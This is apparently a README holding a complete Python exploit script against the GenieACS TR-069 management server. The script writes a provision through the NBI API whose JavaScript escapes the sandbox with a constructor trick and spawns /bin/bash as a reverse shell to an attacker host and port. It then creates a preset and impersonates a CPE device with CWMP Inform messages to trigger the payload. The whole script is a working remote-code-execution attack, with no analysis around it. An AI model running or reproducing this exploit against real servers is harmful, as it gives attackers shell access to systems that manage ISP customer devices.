README.md
Rendering markdown...
import random
import json
import string
import requests
import base64
import threading
import time
from xml.etree.ElementTree import Element, SubElement, tostring
# Configuration
TARGET_IP = "127.0.0.1" # IP of the GenieACS server (e.g. docker host)
LHOST_IP = "host.docker.internal" # Your local IP for receiving the reverse shell (e.g. localhost/host.docker.internal)
LPORT = 4444 # Your local port for receiving the reverse shell
ACS_URL = f"http://{TARGET_IP}:7547/"
NBI_URL = f"http://{TARGET_IP}:7557/"
def put_provision(name='revshell', LHOST=LHOST_IP, LPORT=LPORT):
"""Put a provision value into the device"""
payload = f"""
const global = declare.constructor.constructor('return this')();
const process = global.process;
const require = process.mainModule.require;
try {{
const net = require('net');
const {{ spawn }} = require('child_process');
// Create connection to attacker
const client = new net.Socket();
client.connect('{LPORT}', '{LHOST}', () => {{
// Spawn shell process
const shell = spawn('/bin/bash', ['-i']);
// Pipe shell I/O to network connection
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
// Handle connection close
shell.on('exit', () => client.end());
client.on('error', () => shell.kill());
}});
return {{
status: "Reverse shell initiated",
target: `{LHOST}:{LPORT}`
}};
}} catch(e) {{
return {{
error: "Reverse shell failed: " + e.message
}};
}}
"""
try:
# Send the PUT request
url = f"{NBI_URL}/provisions/{name}".replace("//provisions", "/provisions")
print(f"URL: {url}")
response = requests.put(
url,
data=payload,
timeout=30,
)
print(f"Response: {response.text}")
except Exception as e:
print(f"Error creating GenieACS provision: {e}")
def put_preset(preset_name, provision_name='revshell'):
"""Put a preset value into the device"""
payload = {
"weight": 0,
"channel": preset_name,
"events": {"2 PERIODIC": True},
"precondition": "",
"configurations": [
{"type": "provision", "name": provision_name, "args": None}
]
}
try:
print(f"Payload: {json.dumps(payload, indent=2)}")
# Send the PUT request
url = f"{NBI_URL}/presets/{preset_name}".replace("//presets", "/presets")
print(f"URL: {url}")
response = requests.put(
url,
json=payload,
timeout=30
)
print(f"Response: {response.text}")
except Exception as e:
print(f"Error creating GenieACS preset: {e}")
# SOAP namespaces
NAMESPACES = {
"soap-enc": "http://schemas.xmlsoap.org/soap/encoding/",
"soap-env": "http://schemas.xmlsoap.org/soap/envelope/",
"xsd": "http://www.w3.org/2001/XMLSchema",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"cwmp": "urn:dslforum-org:cwmp-1-0"
}
# Global variables (these would be defined elsewhere in your Python module)
next_inform_timeout = None
pending_inform = False
device = None
session = requests.Session()
inform_interval = 2 # Periodic inform interval in seconds
def start_session(event=None):
"""
Start a CWMP session by sending an Inform message
Args:
event (str, optional): The event type for the inform message
"""
global next_inform_timeout, pending_inform, session
# Cancel any existing timeout
if next_inform_timeout:
next_inform_timeout.cancel()
next_inform_timeout = None
# Reset session state and clear cookies to avoid 400 Bad Request
pending_inform = False
session.cookies.clear()
print(f"Starting session with event: {event or '0 BOOTSTRAP'}")
# Generate random request ID (8 character alphanumeric string)
chars = string.ascii_lowercase + string.digits
request_id = ''.join(random.choice(chars) for _ in range(8))
# Define callback function for when inform body is ready
def inform_callback(body):
# Create SOAP XML document with request ID and body
xml = create_soap_document(request_id, body)
# Define callback for send request response
def send_request_callback(response_xml):
cpe_request()
# Send the request
send_request(xml, send_request_callback)
# Call methods.inform with device, event, and callback
methods.inform(device, event, inform_callback)
def create_soap_document(request_id, body):
"""Create SOAP XML document with proper namespaces"""
# Create root envelope with namespaces
envelope = Element("soap-env:Envelope")
for prefix, uri in NAMESPACES.items():
envelope.set(f"xmlns:{prefix}", uri)
# Create header with ID
header = SubElement(envelope, "soap-env:Header")
id_element = SubElement(header, "cwmp:ID")
id_element.set("soap-env:mustUnderstand", "1")
id_element.text = request_id
# Create body
body_element = SubElement(envelope, "soap-env:Body")
if body is not None:
body_element.append(body)
# Convert to string with XML declaration
xml_str = tostring(envelope, encoding='unicode')
return f'<?xml version="1.0" encoding="UTF-8"?>\n{xml_str}'
def send_request(xml, callback):
"""Send HTTP POST request with SOAP XML"""
global session
# Prepare headers
headers = {
'Content-Type': 'text/xml; charset="utf-8"',
'SOAPAction': '""'
}
try:
# Send POST request through proxy
response = session.post(
ACS_URL,
data=xml or "",
headers=headers,
timeout=30
)
# Check response status
response.raise_for_status()
# Parse response XML if present
response_xml = None
if response.content:
try:
import xml.etree.ElementTree as ET
response_xml = ET.fromstring(response.text)
except ET.ParseError:
response_xml = None
# Call callback with parsed XML
callback(response_xml)
except requests.exceptions.RequestException as e:
print(f"HTTP request failed: {e}")
# On error, schedule next periodic inform
schedule_next_periodic_inform()
callback(None)
def schedule_next_periodic_inform():
"""Schedule the next periodic inform session"""
global next_inform_timeout
if next_inform_timeout:
next_inform_timeout.cancel()
next_inform_timeout = threading.Timer(inform_interval, lambda: start_session("2 PERIODIC"))
next_inform_timeout.start()
print(f"Next periodic inform scheduled in {inform_interval} seconds")
def cpe_request():
"""Handle CPE request and complete CWMP session"""
print("Sending empty request to complete CWMP session...")
# Send empty request to complete the session
def empty_request_callback(response_xml):
print("CWMP session completed")
schedule_next_periodic_inform()
send_request(None, empty_request_callback)
class methods:
@staticmethod
def inform(device, event, callback):
"""Create CWMP Inform message"""
# Create Inform element
inform = Element("cwmp:Inform")
# Device ID
device_id = SubElement(inform, "DeviceId")
# Manufacturer
manufacturer = SubElement(device_id, "Manufacturer")
manufacturer.text = device.get("Device.DeviceInfo.Manufacturer", ["", "Unknown"])[1] if device else "Unknown"
# OUI
oui = SubElement(device_id, "OUI")
oui.text = device.get("Device.DeviceInfo.ManufacturerOUI", ["", "000000"])[1] if device else "000000"
# Product Class
product_class = SubElement(device_id, "ProductClass")
product_class.text = device.get("Device.DeviceInfo.ProductClass", ["", "CPE"])[1] if device else "CPE"
# Serial Number
serial_number = SubElement(device_id, "SerialNumber")
serial_number.text = device.get("Device.DeviceInfo.SerialNumber", ["", "123456"])[1] if device else "123456"
# Event
event_struct = SubElement(inform, "Event")
event_item = SubElement(event_struct, "EventStruct")
event_code = SubElement(event_item, "EventCode")
event_code.text = event or "2 PERIODIC"
command_key = SubElement(event_item, "CommandKey")
command_key.text = ""
# Max Envelopes
max_envelopes = SubElement(inform, "MaxEnvelopes")
max_envelopes.text = "1"
# Current Time
current_time = SubElement(inform, "CurrentTime")
from datetime import datetime
current_time.text = datetime.now().isoformat()
# Retry Count
retry_count = SubElement(inform, "RetryCount")
retry_count.text = "0"
# Parameter List (empty for now)
parameter_list = SubElement(inform, "ParameterList")
parameter_list.set("soap-enc:arrayType", "cwmp:ParameterValueStruct[0]")
# Call callback with the inform body
callback(inform)
def stop_periodic_informs():
"""Stop periodic inform sessions"""
global next_inform_timeout
if next_inform_timeout:
next_inform_timeout.cancel()
next_inform_timeout = None
print("Periodic informs stopped")
# Example usage
if __name__ == "__main__":
# Generate random serial number (12 character alphanumeric string)
put_provision('revshell', LHOST_IP, LPORT)
put_preset("exploit-periodic2",'revshell')
chars = string.ascii_uppercase + string.digits
random_serial = ''.join(random.choice(chars) for _ in range(12))
# Sample device data structure
device = {
"Device.DeviceInfo.Manufacturer": ["xsd:string", "DF"],
"Device.DeviceInfo.ManufacturerOUI": ["xsd:string", "123456"],
"Device.DeviceInfo.ProductClass": ["xsd:string", "Exploit"],
"Device.DeviceInfo.SerialNumber": ["xsd:string", random_serial]
}
print("Starting CWMP session...")
print(f"Endpoint: {ACS_URL}")
print(f"Device Serial Number: {random_serial}")
print(f"Periodic inform interval: {inform_interval} seconds")
try:
# Start initial session with 2 PERIODIC event
start_session("0 BOOTSTRAP")
# Keep the program running to allow periodic informs
print("Press Ctrl+C to stop periodic informs...")
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\nShutting down...")
stop_periodic_informs()
print("Program terminated")